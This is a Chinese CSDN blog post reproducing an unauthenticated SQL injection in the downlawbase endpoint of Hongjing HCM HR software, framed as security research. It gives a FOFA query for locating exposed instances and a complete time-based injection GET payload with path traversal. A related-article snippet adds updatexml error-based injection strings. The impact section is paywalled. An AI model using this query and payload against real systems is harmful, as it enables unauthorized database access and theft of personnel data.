【漏洞复现】宏景HCM downlawbase SQL注入漏洞

最新推荐文章于 2024-09-04 22:05:23 发布

从不学安全

最新推荐文章于 2024-09-04 22:05:23 发布

阅读量385

点赞数 3

分类专栏：漏洞复现文章标签：安全网络

本文链接：https://blog.csdn.net/qq_67810151/article/details/136661071

版权

漏洞复现专栏收录该内容

61 篇文章 30 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了宏景人力资源管理软件HCM中downlawbase接口存在的SQL注入漏洞，该漏洞允许未经身份验证的攻击者执行任意SQL命令，可能导致敏感数据泄露。文章详细阐述了漏洞概述、测绘语句，并提供了漏洞复现步骤和影响范围。

摘要由CSDN通过智能技术生成

0x01 产品简介

宏景人力资源管理软件是一款人力资源管理与数字化应用相融合，满足动态化、协同化、流程化、战略化需求的软件。

0x02 漏洞概述

宏景HCM downlawbase 接口处存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

0x03 测绘语句

fofa：app="HJSOFT-HCM"

0x04 漏洞复现

payload：GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=11';waitfor+delay+'0:0:5'--+ HTTP/1.1

0x05 影响范围

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
【漏洞复现】宏景HCM downlawbase SQL注入漏洞

宏景HCM downlawbase 接口处存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。
复制链接

扫一扫

专栏目录

订阅专栏

【1day】复现宏景HCM codesettree SQL注入漏洞（CNVD-2023-08743）

记录并分享学习安全的知识点..

07-26

1295

北京宏景世纪软件股份有限公司 HCM codesettree 接口存在SQL注入漏洞，攻击者通过漏洞可以获取到登陆系统的账号密码和数据库信息。

宏景eHR SQL注入漏洞复现（CNVD-2023-08743）

0xSec

05-30

4988

宏景eHR 存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

参与评论您还未登录，请先登录后发表或查看评论

【漏洞复现】宏景HCM人力资源信息管理系统——LoadOtherTreeServlet——SQL注入

LongL_GuYu的博客

07-13

510

宏景HCM人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。其`LoadOtherTreeServlet`接口处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

宏景HCM人力资源信息管理系统fieldsettree接口SQL注入

weixin_43567873的博客

03-05

127

宏景HCM人力资源信息管理系统fieldsettree接口SQL注入

宏景HCM SQL注入漏洞(CNVD-2023-08743) ，hrms加解密工具

11-07

宏景HCM SQL注入漏洞(CNVD-2023-08743) ，hrms加解密工具。需要 Java1.8 环境，执行如下命令启动 HrmsTool 工具， -e 是加密， -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java -jar HrmsTool.jar -d xxx

网络安全——SQL注入漏洞

热门推荐

weixin_54055099的博客

09-08

1万+

SQL注入基本知识和SQL注入基本流程，sqli-labs

宏景eHR downlawbase SQL注入漏洞复现

0xSec

03-13

449

宏景eHR downlawbase接口处存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

【漏洞复现】宏景ehr-hcm-loadhistroyorgtree-sql注入

知黑而守白

01-09

427

宏景HCM系统是一款由宏景软件研发的系统，主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备了报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。该漏洞存在于宏景EHR人力资源管理系统的 loadhistroyorgtree 接口处，该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

【漏洞复现】宏景HCM-SQL注入-downlawbase

知黑而守白

04-10

428

宏景HCM系统是一款由宏景软件研发的系统，主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备了报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。该漏洞存在于宏景EHR人力资源管理系统的 showmediainfo 接口处，该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

某购物商城系统commodtiy接口处存在任意文件上传漏洞

weixin_43167326的博客

05-10

855

某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件，例如后门、木马或勒索软件，以获取对服务器的远程访问权限或者破坏系统，对服务器造成极大的安全隐患。

SQL注入（基于 tryhackme 的讲解）

m0_61948493的博客

01-03

2887

sql注入的简单且详细的讲解

墨者 - SQL注入漏洞测试(报错盲注)

吃肉唐僧的博客

07-07

2722

根据题意，用updatexml构造报错回显' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库 ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表' and updatexml(1,concat(0x7e,(select table_n...

AI安全立法：加州新法案的争议与未来影响

2301_79342058的博客

09-01

804

正如之前详细探讨过的那样，SB-1047法案要求AI模型的创建者在模型出现“对公共安全和安保构成新威胁”时，尤其是在“缺乏人类监督、干预或管理”的情况下，必须实施一种可以“关闭”该模型的“杀手开关”。不要错过这个机会，成为AI领域的领跑者。在周三宣布立法通过时，该法案的发起人、州参议员斯科特·维纳（Scott Weiner）引用了AI行业知名人士的支持，如Geoffrey Hinton和Yoshua Bengio（这两位去年也签署了一份声明，警告快速发展的AI技术可能带来的“灭绝风险”）。

【游戏安全】CheatEngine基础使用——如何对不同类型的数值进行搜索？如何破解数值加密找到想修改的数值？

m0_62783065的博客

09-04

135

【游戏安全】CheatEngine基础使用——如何对不同类型的数值进行搜索？如何破解数值加密找到想修改的数值？

Gartner发布安全威胁情报产品和服务市场指南：威胁情报产品和服务需具备的8项核心能力和21项可选能力

lurenjia404的博客

09-04

497

安全和风险管理领导者很难知道哪些威胁会真正影响到他们的组织。他们应该利用这项研究来选择正确的安全威胁情报产品和服务，并更有效地了解和应对威胁形势。

MSSQL数据库安全配置